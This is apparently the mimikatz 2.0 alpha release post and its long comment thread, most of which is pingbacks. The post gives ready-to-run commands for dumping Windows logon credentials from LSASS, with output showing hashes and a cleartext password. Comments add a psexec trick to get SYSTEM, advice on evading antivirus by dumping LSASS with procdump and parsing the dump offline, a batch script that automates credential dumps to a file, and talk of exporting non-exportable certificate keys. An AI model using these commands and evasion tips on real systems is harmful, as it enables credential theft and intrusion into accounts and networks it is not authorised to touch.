mimikatz

mimikatz 2.0 has just been released as an alpha version

For those in a hurry looking for passwords…

Run as administrator:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

271 thoughts on « mimikatz »

  1. Ping : effeciently dumping Windows password hashes « Daniel Weis's I.T Security Blog

  2. Ping : effeciently dumping Windows password hashes - Daniel Weis - Blogs - Telligent

  3. Ping : Dis9 Team » Dump Windows password hashes efficiently

  4. Ping : Mimikatz Contraseñas de Windows « Seguridad y Redes

  5. Ping : Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM) « sanchezdiego.com.ar

  6. Ping : Latino » Blog Archive » Mimikatz Contraseñas de Windows

  7. Ping : Dumping Cleartext Credentials with Mimikatz « Daniel Weis's I.T Security Blog

  8. Ping : Dumping Cleartext Credentials with Mimikatz - Daniel Weis - Blogs - Telligent

  9. Ping : Security News « CyberOperations

  10. Ping : mimikatz: Tool To Recover Cleartext Passwords From Lsass – Dacheng Luo

  11. Ping : Jeremiah Grossman, Security News – Episode 278 » 華人資安論壇與資安認知教育網誌

  12. Ping : FeiFei's Blog » 获取Windows系统明文密码神器

  13. Ping : 调试器神器 – mimikatz-获取windows处于active状态账号明文密码[转] | Vision's Blog

  14. Ping : 轻量级神器 mimikatz – 直接抓取 Windows 明文密码! - Firedli's Blog

  15. Ping : 通杀WIN服务器得明文密码神器

  16. Ping : Outils, services, sites à (re)découvrir 2012 S08 | La Mare du Gof

  17. secpol.msc -> Local Policies -> User Rights Assignments -> Debug Programs
    Remove Administrators/System
    This is also how you stop Pass-The-hash from working too.
    I’ve tried on Win7 and XP SP3 (english) and I get this error on XP
    mimikatz # inject::process lsass.exe sekurlsa.dll
    PROCESSENTRY32(lsass.exe).th32ProcessID = 640
    Erreur : Impossible d’injecter ! ; (0x00000008) Not enough storage is available to process this command.
    Same with Win7 (64-bit), only the hex is different
    Erreur : Impossible d’injecter ! ; (0xc0000022) {Access Denied} A process has requested access to an object, but has not been granted those access rights.

    • Nevermind :) I was not using the 64-bit (x64) version on my 64-bit OS.
      Also to work around removing the sedebug priv using group policy and or secpol.msc, you can run as system (psexec -s cmd.exe) and everything works well. Very good tool, I hope you make even more additions! (@dumpall would be cool too, dump anything and everything this tool has to offer)
      -william

    • 0x00000008 is from an NT 5 RDP session, not because the debug right was removed ;)
      in both cases: psexec -s XXX … no need for the debug right, and it bypasses session isolation in RDP ;)

  18. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码!

  19. Ping : 百寞' Blog » Blog Archive » 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码!

  20. Ping : 转:windows下轻量级调试神器—mimikatz – 2哥博客|H3CIE|网络技术|数据中心|路由交换|网络安全|黑客技术|CCIE|Linux|服务器|wordpress

  21. Ping : 神器mimikatz使用命令方法总结 | Vision's Blog

  22. Ping : mimikatz的使用方法总结 « Crackerban Team

  23. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码! « x7z|关注网络安全|Web安全|最新0day漏洞|网站安全顾问

  24. Isn’t this how Windows can send HTTP-Authentication using IE without prompting for the password? If so, could a program like Firefox, launched as the same user who is logged on, read those credentials and also pass HTTP-authentication without being prompted? This could add functionality to something like FF if this was so, could it not? I mean IE does it…
    -mandingo-

  25. Ping : Unsung Heros (the list) « Cатсн²² (in)sесuяitу / ChrisJohnRiley

  26. C:\Program Files\WinRAR\ts\Win32>mimikatz.exe
    mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
    // http://blog.gentilkiwi.com/mimikatz
    
    mimikatz # privilege::debug
    Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
    
    mimikatz # inject::process lsass.exe sekurlsa.dll
    PROCESSENTRY32(lsass.exe).th32ProcessID = 452
    Erreur : Impossible d'injecter ! ; (0x00000008) 存储空间不足,无法处理此命令。
    
    mimikatz #

    help me

  27. FYI, Windows 8 (dev-preview) is working for me so far. Haven’t tried all the commands yet but so far so good. Is there a way to run all commands planned? Maybe output to a single file?
    -mandingo-

  28. Ping : Drunken Security News – Episode 279 » 信息安全播客

  29. Ping : Tonya Bacam, Security Onion – Episode 279 » 華人資安論壇與資安認知教育網誌

  30. Ping : Live from CCDC – Episode 280 » 華人資安論壇與資安認知教育網誌

  31. Ping : Recuperando contraseñas de Windows en texto plano (I de II)

  32. Ping : 牛X神器-mimikatz | Yoio's Blog

  33. Ping : 欺天: NLP | HACK | 社会工程学 | 金融

  34. Ping : Remotely Recovering Windows Passwords in Plain Text « CYBER ARMS – Computer Security

  35. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码 | Linglin'S Blog

  36. Ping : Episode 647 – Quantum Encryption,TriCk, 100 days, Mimikatz, and MySQL DoS | InfoSec Daily

  37. Ping : Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM) | GEEKNOPATAS

  38. Пополним коллекцию благодарностей на иностранных языках :)
    Спасибо!

  39. Ping : Pw » 关注互联网技术,专注于信息安全,记录生命点滴故事.

  40. Ping : Recovering Windows Passwords Remotely in Plain Text | IT Security

  41. Ping : mimikatz获取Windows系统明文密码神器 | 网络大学|Network University

  42. Ping : Mimikatz creator to Speak at PH Days Conference « CYBER ARMS – Computer Security

  43. LOL,C’est un logiciel qui peut faire beaucoup de trucs,ça me plais beaucoup ^.^
    mais il y a trop de méthodes TT,chaque fois je dois venir ici pour chercher le rappel ,peut-être c’est moi qui me suis trompé ,puisque la langue française est compliqué pour nous ,toute façon il faut apprendre .
    Bon courage et je vous souhaite une très bonne année 2012 .

  44. Very nice work. I successfully got clear text passwords by injecting into LSASS on Windows 2008 R2, however, I had a problem on Windows 7 x64. I launched a local cmd.exe shell as Local System by using PsExec. From there I launched mimikatz. After typing @getLogonPasswords, the data was there but the wdigest passwords were completely garbled text. I guess something went wrong with the injection. I wonder if it has anything to do with ASLR.

    • No problem with ASLR ;) It must be a unicode or incorrect unicode string for the computer account, but it appears to be valid unicode… :( (try chcp before ;))
      Why did you use psexec to get SYSTEM? You can use privilege::debug

      • Yes, privilege::debug worked better. On this PC, I was only able to retrieve my smartcard PIN, because I don’t log in with my password. :)

      • Yeah — it showed just the portion of the PIN that I type to login/unlock my PC. It did not of course display the automatically changing code that is shown on the LCD display. :)

  45. Note that I must have recently unlocked my PC in order for the RSA SecurID PIN to show up — if I have not logged in or unlocked the PC within 30 minutes or so, the PIN does not appear in the list. Alright, here is my mimikatz output. I ran it first, and did not see the RSA PIN. Then, I locked my workstation and then unlocked it, then I ran @getLogonPasswords again. Then I did see my RSA PIN displayed. I have tried to change names and hashes to protect the innocent. :)

    mimikatz # @getLogonPasswords
    
    Authentification Id         : 0;618713
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :
            tspkg :         n.t. (LUID KO)
    
    Authentification Id         : 0;613648
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :
            tspkg :         n.t. (LUID KO)
    mimikatz # @getLogonPasswords
    
    Authentification Id         : 0;618713
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :       THIS_IS_MY_RSA_PIN
            tspkg :         n.t. (LUID KO)
    
    Authentification Id         : 0;613648
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :       THIS_IS_MY_RSA_PIN
            tspkg :         n.t. (LUID KO)
    • So funny :), maybe you can try @getLogonPasswords full for « full » information.
      Is your NTLM(RSA_PIN) the same as the msv1_0 NTLM hash?

      I’m @PHDays, unfortunately I cannot test it now :)

      • That’s a good question… I’ll have to crack it with something like ighashgpu. Since I know what it is, it should be pretty easy to crack the hash. :)

      • You don’t have to do that!
        When it’s available, take the cleartext PIN code, hash it in NTLM, compare :)

  46. Sorry, I got distracted with other things…

    No it’s odd – mimikatz will dump my SecurID PIN as the « wdigest » but the corresponding NTLM hash does not match either the PIN or my user account password. I don’t know what it is.

  47. Ping : Security News #0×11: Take Hold of the Flame « CyberOperations

  48. Ping : Recovering Clear Text Passwords – Updates « CYBER ARMS – Computer Security

  49. I downloaded your source code, but there is something I could not find, like the function GetMSVLogonData. Can you show how it works? Thank you! :)

  50. Ping : 神器mimikatz使用方法 | Individual World

  51. Ping : 法国黑客神器 mimikatz 直接读取管理员密码 通杀xp win2003 win7 win2008 初体验 | 执魄's Blog

  52. Ping : 神器mimikatz | WG1博客

  53. Ping : 抓Windows系统的明文密码 - F19ht's blog

  54. Ping : Làm thế nào để đồng bộ Active Directory Sync trong khi Username và Password bị mã hoá theo OS 32/64bit ? (tiếp theo) | Thangletoan’s Weblog

  55. Ping : 神器mimikatz | 冰锋刺客

  56. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码 | Startend.Blog's

  57. Ping : 神器mimikatz | 潇湘博客

  58. Ping : mimikatz - 网站安全,服务器安全,防御检测

  59. Ping : Password Cracking « Aggressive Virus Defense

  60. mimikatz is a great thing!
    I watched the presentation and saw the word СПАСИБО (thank you)!
    So maybe you’ll understand :) Many thanks to you!

  61. Ping : 问君几多愁 » msf中使用MIMIKATZ

  62. Ping : 神器 – mimikatz | 小兮博客

  63. Ping : Lóránd Somogyi » Openconnect replacement for Cisco AnyConnect on Linux (Ubuntu)

  64. Ping : Grab Windows Password In Plain Text!!!

  65. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码 | 小i博客

  66. Ping : 如何获取已登录账户的Windows密码 | lzsb.me

  67. Mimikatz FTW! Allowed me to circumvent my IT department’s issuing of a new RSA certificate when I changed my home PC, thus saving much time and stress. Merci!

  68. Ping : Windows 8 Clear Text Passwords from Locked Desktop with Mimikatz « CYBER ARMS – Computer Security

  69. Ping : Saber la pass del ADMIN « 3lhacker – Comunidad Informatica

  70. Hello,

    FYI, mimikatz does not work on Windows 2003 Enterprise (English) in the pre-service-pack version.
    “The procedure entry point EncodePointer could not be located in the dynamic link library KERNEL32.dll”. The DLL version is 5.2.3790.

    It works fine once SP2 is installed (SP1 not tested).

    Many thanks for the tool!

  71. Ping : 2012 in Review and a Look Forward to 2013

  72. This is all gibberish to me. Hello, foreign hackers! I don’t understand anything you said; I really don’t know your language. How did you learn it?!

  73. Ping : Metasploit: Postexploitation – Passwort im Klartext auslesen | freie-welt.com

  74. Ping : 本机Windows密码查看神器-mimikatz | 千行站

  75. Ping : Metasploit: Postexploitation – Passwort im Klartext auslesen | freie-welt.com

  76. Ping : Jak na export privatniho klice certifikatu, kdyz je oznacen jako non-exportable | logon

  77. Ping : 直接爆WIN2003+服务器的管理员密码的Mimikatz软件 | 紫云残雪's Blog

  78. Ping : Hacking Windows with Password Grabbing | ColeSec Security

  79. Ping : Remotely Recovering Windows Passwords in Plain Text « ITSolutionDesign

  80. Ping : .:[ d4 n3wS ]:. » Mimikatz

  81. Ping : 神器mimikatz使用命令方法总结 | rambowind

  82. Ping : 扫雷神器 – mimikatz

  83. Ping : Obtener contraseña de administrador de Windows desde el propio Windows | DURKH3IM'S BLOG

  84. Ping : mimikatz-en (English Translation of Mimikatz) Release « AttackVector.org

  85. Ping : 法国黑客神器 mimikatz 直接读取管理员密码 通杀Win系 – 思安阁

  86. Ping : Wouter Veugelen blog » English version of Mimikatz: Mimikatz-en.exe

  87. Ping : WCE and Mimikatz in memory over meterpreter | Justin - Blog

  88. Ping : mimikatz | Blog de Gentil Kiwi | opexxxblog

  89. Can you attack remote PCs with this, or do you have to be on the actual client’s machine to run it? You would also need to have admin rights, I’m assuming.

    Good tool, now just trying to see if it can be executed to gain access to a remote pc. I’m the IT guy at work.

    Keep up the good work.

  90. Ping : Reflective DLL Injection with PowerShell | clymb3r

  91. Ping : [Intermédiaire] Récupérer un mot de passe Windows avec Mimikatz | Yoann's Workshop

  92. Ping : Modifying Mimikatz to be Loaded Using Invoke-ReflectiveDLLInjection.ps1 | clymb3r

  93. Ping : [Sécurité] Mimikatz | aurelienantonoff

  94. Microsoft Forefront is detecting the Alpha as well as the RC of Mimikatz. Is there a way we can run it without encrypting the exe to bypass the AV?

  95. What is the command-line format in the new alpha version?

    mimikatz.exe privilege::debug sekurlsa::logonPasswords exit >> result.txt

    In batch mode it crashes

  96. Ping : 記某次主機提權 | Dave's Blog

  97. Ping : Goading Around Firewalls | Strategic Cyber LLC

  98. Ping : Dumping Clear Text Credentials from Windows | GSR8 Blog

  99. Ping : PTSec – Portal de Segurança Português » [Tutorial] Passwords do Windows XP, 7, 8 em plaintext

  100. Ping : Mimikatz & WCE & Metasploit

  101. Ping : mimikatz – Clear Text Passwords | Hacking Defined

  102. Will I be able to export a Certificate along with its private key even if the key isn’t exportable, and import the Certificate to another computer?

    Thanks.

      • Well is there any way that you know for sure? I need to format my computer and reinstall windows, but before I do, I want to make sure that I will be able to use my certificate again.

        Is there a way to do this?

        Thanks.

  103. Ping : 如何导出Windows哈希系列一- FreebuF.COM

  104. Ping : Export Non-exportable Certificate Keys from store

  105. Ping : 如何导出Windows哈希系列一 | GERFALKE

  106. Ping : Chinadu`s Blog » 如何导出Windows哈希系列一

  107. Hi mate, awesome tool. Any chance it will be able to dump domain user hashes (usually from Active Directory) in NTLM / LM format? I have yet to find a program which is lightweight or small that can do it. Would be great, man!

    keep it up!

  108. Ping : Are “unexportable” certificates a real security measure or just security theater? - Just just easy answers

  109. Ping : Recovering Plain Text Passwords with Metasploit and Mimikatz | CYBER ARMS - Computer Security

  110. Ping : Cannot export certificate with private key? | Frederick Dicaire

  111. Why is it that I cannot unzip these binaries? Am I missing something? Trying to use it in conjunction with USB Rubber Ducky and it doesn’t seem to want to unzip with 7zip or RAR

  112. mimikatz # sekurlsa::minidump c.dmp
    Switch to MINIDUMP
    
    mimikatz # sekurlsa::logonPasswords
    ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (9) !=
     PROCESSOR_ARCHITECTURE_INTEL (0)
    ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
    
    mimikatz #

  113. I’m struggling with the 2.0 version in order to export certificates. The « crypto::certificates » command only lists certificate stores for me, but no idea how to export… Please advise

  114. Hi, thank you for this tool. What can you do with highly protected certificates?
    Do you know what function verifies the password for exporting the private key?

  115. Hey =)
    Is it possible to use mimikatz with a RAM dump?
    If not, this would be a nice feature.

    Greets from Germany
    Chris

      • Thanks, but I only have complete images in RAW format. Do you know any way to extract passwords out of that?
        And could you PLEASE PLEASE PLEASE write your error messages in English =( ?

      • MANY THANKS TO YOU for programming the WinDbg extension!!! I saw a post yesterday on Twitter with a comment about this extension; today I checked it out. It is VERY NICE! I had a little fight with the wow64exts in WinDbg but finally it worked! Many thanks and greets from Germany!
        Greets Chris

  116. Ping : Hash传递攻击Windows2012远程桌面 | Panni_007 Security

  117. Ping : 【Windows】利用mimikatz解出登入中使用者密碼 | Lun

  118. Ping : Dumping passwords in a VMware .vmem file - Remko Weijnen's Blog (Remko's Blog)

  119. Ping : The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1 « Alex Ionescu’s Blog

  120. Ping : TEKNOLOJİ : Bellekten Parolaların Elde Edilmesi – 2 | YÜKSEK STRATEJİ

  121. Excellent information about the DPAPI SHA1 hash! The question remains how it has been generated since Windows Vista, given that it is no longer « simply » SHA1(UNICODE(password))?

  122. Ping : Using CVE 2013-5065 | s0ze.com

  123. Ping : Достаём пароли от всех активных учетных записей на windows 7 и 2008 | soft-spy.ru

  124. (sorry I write in English, mon français n’est pas très bon)

    I’ve seen that Windows 8.1 is supported in alpha 2.0 version.
    However, clear password dump is not available anymore.

    Is because of a new protection (or a better handle) of Windows 8.1?

    I have found no information regarding the new countermeasures in Windows 8.1.

    Do you have any information about this regards?

    And congrats for the great and so useful tool!

    • mimikatz dumps passwords when they’re in memory; when they’re not…. ;)

      Windows 8.1 does not keep passwords in memory as usual. Only LiveSSP as I’ve seen (or when you enable Credentials Delegations)

  125. Having a buggy issue with mimikatz alpha 2.0 x64 and Windows 8.1 enterprise.

    When using either procdump with sekurlsa::minidump… or mimikatz alone to pull lsass.exe… I do not get any passwords from a Windows 8.1 x64 system that has just been logged into. No errors, just « password: (null) » everywhere I would expect a password.

    If I lock the system, and unlock using a password… then run procdump or mimikatz again… I DO get a correct password.
    It seems the first logon password is not stored in lsass process memory, or not at the offset that mimikatz is looking. But subsequent credential input is properly retrieved (such as lock and unlock).
    In Windows 7 x64… works perfectly. Can pull passwords from very first logon.

    • As you’ve seen, this is not a mimikatz issue ; Windows 8.1 does not store « by default » passwords in memory (see previous comment)
      Like in NT5 with the Kerberos provider, some password fields are populated after unlocking.

      You can check this with : sekurlsa::searchpasswords.
      It searches the whole process for credentials, and it’s provider / offset independent.

  126. I am using the new version. I try to export a certificate from the computer store, but cannot figure out how to change the store. Is there a way to do this?
    Thank you for the tool,
    -D

    mimikatz # crypto::stores
    Asking for System Store ‘CERT_SYSTEM_STORE_CURRENT_USER’ (0x00010000)

  127. Has something changed with the new version?

    It used to work on my Win7 Enterprise 64bit, but suddenly not anymore. (running the 64bit version). It looks like the password is still hashed / encrypted.. Anyone else have this problem? Other than that, excellent tool, much respect!

    Merci pour ton feedback!

    Output example (I replaced some info with XXXXXXXXXX)

    User Name         : XXXXXXXXXX
    Domain            : NT Service
    SID               : S-1-5-80-997390408-XXXXXXXXXX-3119169589-2253446180-22265637
    86
            msv :
             [00000003] Primary
             * Username : XXXXXXXXXX
             * Domain   : UK
             * LM       : 00000000000000000000000000000000
             * NTLM     : 3bdf6dc3f414a299b1acfdaa80d8030d
             * SHA1     : 3b6264001febc9917d700cb04f1307667fcfb050
            tspkg :
             * Username : XXXXXXXXXX
             * Domain   : UK
             * Password : b2 28 3b f5 eb 00 d3 31 1f 4b 57 1d 86 ca 1f ca 8f c1 36 a
    1 cf e0 73 20 70 a6 47 12 de 25 37 b8 48 9c 3f 3e 06 03 64 d0 5c e6 cd 28 fc d3
    38 ac 08 a0 bc bb 5a bf b7 7b d3 0b 92 7b 56 32 26 c0 d8 b0 f1 8a ce cb b5 df ce
     a4 36 69 b8 be f7 55 4a 03 05 8b a7 79 d8 de 11 06 5e e3 27 9d f7 9f 81 dd a0 2
    a 1f 83 3b a2 75 ee 08 7d e3 a5 cf 17 29 73 77 8a d8 dc 59 8f 3d 09 70 f9 1a d5
    1a 23 5c fa 03 7b b0 18 d4 3f da d4 1e 94 2d 0b b1 e7 6f f1 f3 1e a7 ab 21 0a 36
     c6 64 05 5e 11 cf 9a cf f5 42 f6 c9 ed 0d ee a9 4a 3a 6c 44 cf d5 f1 c8 fd eb 3
    6 a6 93 ee c5 14 d1 6f b1 0e 01 30 44 3c 3d 3d c4 30 e4 77 e8 5e 12 7a 8f ee 60
    c2 3d dd 84 a5 6a 75 07 32 ff bd 84 84 8f ff 8c 17 a1 54 7a fe dc 52 74 b9 cb 6e
     d2 62 6c d6 ec 35 b6

    • Hi Michel,

      Service passwords, computer passwords, and some others are not necessarily « human readable ». Nobody types them! So in some cases Windows generates random « binary » passwords!

      In your case b2 28 3b f5 [...] d6 ec 35 b6 is the real binary password =)

      /* A_SHAInit/A_SHAUpdate/A_SHAFinal are the undocumented SHA-1 routines exported by advapi32/ntdll;
         SHA_CTX, SHA_DIGEST and kull_m_string_wprintf_hex come from the mimikatz sources. */
      const BYTE pwd[] = {0xb2, 0x28, 0x3b, 0xf5, [...], 0xd6, 0xec, 0x35, 0xb6}; /* the bytes shown as Password above */
      SHA_CTX shactxInput;
      SHA_DIGEST shaInput;
      
      A_SHAInit(&shactxInput);
      A_SHAUpdate(&shactxInput, pwd, sizeof(pwd)); /* hash the raw password buffer, no UTF-16 conversion */
      A_SHAFinal(&shactxInput, &shaInput);
      
      kull_m_string_wprintf_hex(shaInput.digest, SHA_DIGEST_LENGTH, 1); /* print the 20-byte digest as hex */

      Output is: 3b 62 64 00 1f eb c9 91 7d 70 0c b0 4f 13 07 66 7f cf b0 50, your SHA1 ;)
      mimikatz’s credentials output routine tries to detect whether the password is a printable string; if not, it displays it in hex.

  128. Hello again!

    Thanks so much for the quick reply! This still leaves me with a couple of questions though:
    1) I thought Mimikatz would look for the password stored in memory, which is supposed to be cleartext.
    2) Mimikatz used to work on my computer perfectly, and suddenly it only produces hashes (Is the previous version of Mimikatz still available somewhere?)
    3) A SHA1 hash is (I think) very hard to decrypt, so Mimikatz doesn’t always work on all systems?

    Thanks again for the feedback!

    Cordialement, Michel

    • My apologies! I saw that I can still retrieve the password with the new MK version :) You can delete my two comments if you want.

      Thanks again and best regards, Michel.

  129. Ping : HackLab

    • Yep, since April 2012… fortunately the source code is available ;)
      As for Symantec, what I loved at the time:
      « The tool allows an attacker to perform the following actions on the computer:

      • Cheat at minesweeper. »

  130. I love Mimikatz, it is a great tool.

    I like to procdump memory and then use the minidump function to process the dump off the client, so even if Mimikatz is picked up by AV and can’t be run locally it will still work! ;-)

    But I sometimes get a « MAJOR VERSION » error.

    Is this because I am using the wrong version of Mimikatz?

    Or does it mean that I am trying to work with a version of Windows such as XP which doesn’t natively have the Tspkg, Wdigest or Kerberos TGT functionality, and it is the version of Windows that is wrong?

  131. Ping : Security News #0×68 | CyberOperations

  132. Ping : PowerShell Magazine » Accidental Sabotage: Beware of CredSSP

  133. Ping : 神器mimikatz发布2.0 | Jarett's Blog

  134. Ping : Logging on as Domain Admin to end user workstations? Think again! | Tailspintoys – 365lab.net

  135. Ping : Exporting the not exportable – on the topic of Windows crypto key storage | Notes on open source and random ramblings

  136. Ping : procdump与mimikatz绕过杀毒软件读取密码 | Ends

  137. Ping : 神器mimikatz发布2.0_安全工具-十堰网络安全研究中心

  138. Ping : CARA MENGETAHUI PASSWORD LOGIN ADMINISTRATOR PADA SISTEM OPERASI WINDOWS | NEWBIE26 INSIDE

  139. Ping : Backdoor в Active Directory - Mimikatz Golden Ticket | Levinkv's Blog - Информационная БезопасностьLevinkv's Blog – Информационная Безопасность

  140. Ping : Remote Desktop’s Restricted Admin: Is the Cure Worse Than the Disease? - Hedgehog Security

  141. Ping : Remote Desktop’s Restricted Admin: Is the Cure Worse Than the Disease? | GeekTime

  142. If I don’t run privilege::debug I get « ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory : 00000005 ». Is there somewhere in your blog explaining what’s going on here that requires it to be run first?

  143. Ping : How to Break Windows 8 Picture Password Security | Windows 8 Password

  144. Ping : EXTRAYENDO CONTRASEÑAS DE LA RAM CON MIMIKATZ 2.0 | SECTRACK DOMINICANA

  145. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码! | 旭达网络科技(深圳)有限公司专业架设各种服务器

  146. Ping : Windows Logon Password – Get Windows Logon Password using Wdigest in Memory Dump | Forensic Focus - Articles

  147. Ping : 三菱東京UFJに蔑まれているMacでBizSTATIONを使う | 高橋文樹.com

  148. Ping : Meterpreter Kiwi Extension: Golden Ticket HOWTO | Strategic Cyber LLC

  149. Ping : Anonyme

  150. Ping : Retrive windows password in cleartext | Technical guides by Gsec.se

  151. Ping : Mimikatz: A nasty little piece of awesomeness | Deep InfoSec

  152. Ping : 神器mimikatz 2.0 - 中国X黑客小组

  153. Ping : Adli Bilişim İncelemelerinde Mimikatz İle Şifre Elde Etme | Halil ÖZTÜRKCİ

  154. Ping : Exploit a Windows system memory and get clear text passwords

  155. Ping : 强制抓取本机登录密码 神器mimikatz2.0发布 | 老D

  156. Ping : Windows密码抓取神器mimikatz2.0发布 - Z 's

  157. Ping : Windows密码抓取神器mimikatz2.0 | 扯蛋

  158. Ping : The path to the Golden Ticket | Count Upon Security

  159. Ping : Export non-exportable certificate – DotMS

  160. Ping : PowerShell Magazine » PowerSploit

  161. Ping : PowerShell Magazine » Owning Networks and Evading Incident Response with PowerShell

  162. Ping : 密码抓取神器mimikatz2.0发布 | 七行者博客

  163. Ping : Sacar las contraseñas de Windows con mimikatz. | SmythSys IT Consulting

  164. Save this file as anyname.bat and run it as administrator from CMD.
    @echo off
    rem date /t and time /t output is locale dependent; the tokens below assume "Day MM/DD/YYYY" and "HH:MM"
    For /f "tokens=2-4 delims=/ " %%a in ('date /t') do (set mydate=%%c-%%a-%%b)
    For /f "tokens=1-2 delims=/:" %%a in ('time /t') do (set mytime=%%a%%b)
    rem mm.exe is the renamed mimikatz binary; output goes to a file named after the timestamp
    mm.exe privilege::debug sekurlsa::logonpasswords exit > %mydate%_%mytime%

  165. Ping : The Evolution of Protected Processes – Part 1: Pass-the-Hash Mitigations in Windows 8.1 | My Website

  166. Ping : Cached Domain Credentials in Vista/7 (AKA Why Full Drive Encryption is Important) - Hedgehog Security

  167. Ping : Sthack 4.0 : Confs & Ctf in Bordeaux ! – WordPress

  168. Ping : Recopilación de herramientas de seguridad informática | Seguridad Informatica

  169. Ping : Lista com ferramentas de segurança e pentest | Mundo Tecnológico

  170. Ping : Sthack 4.0 : Confs & Ctf in Bordeaux ! | WordPress
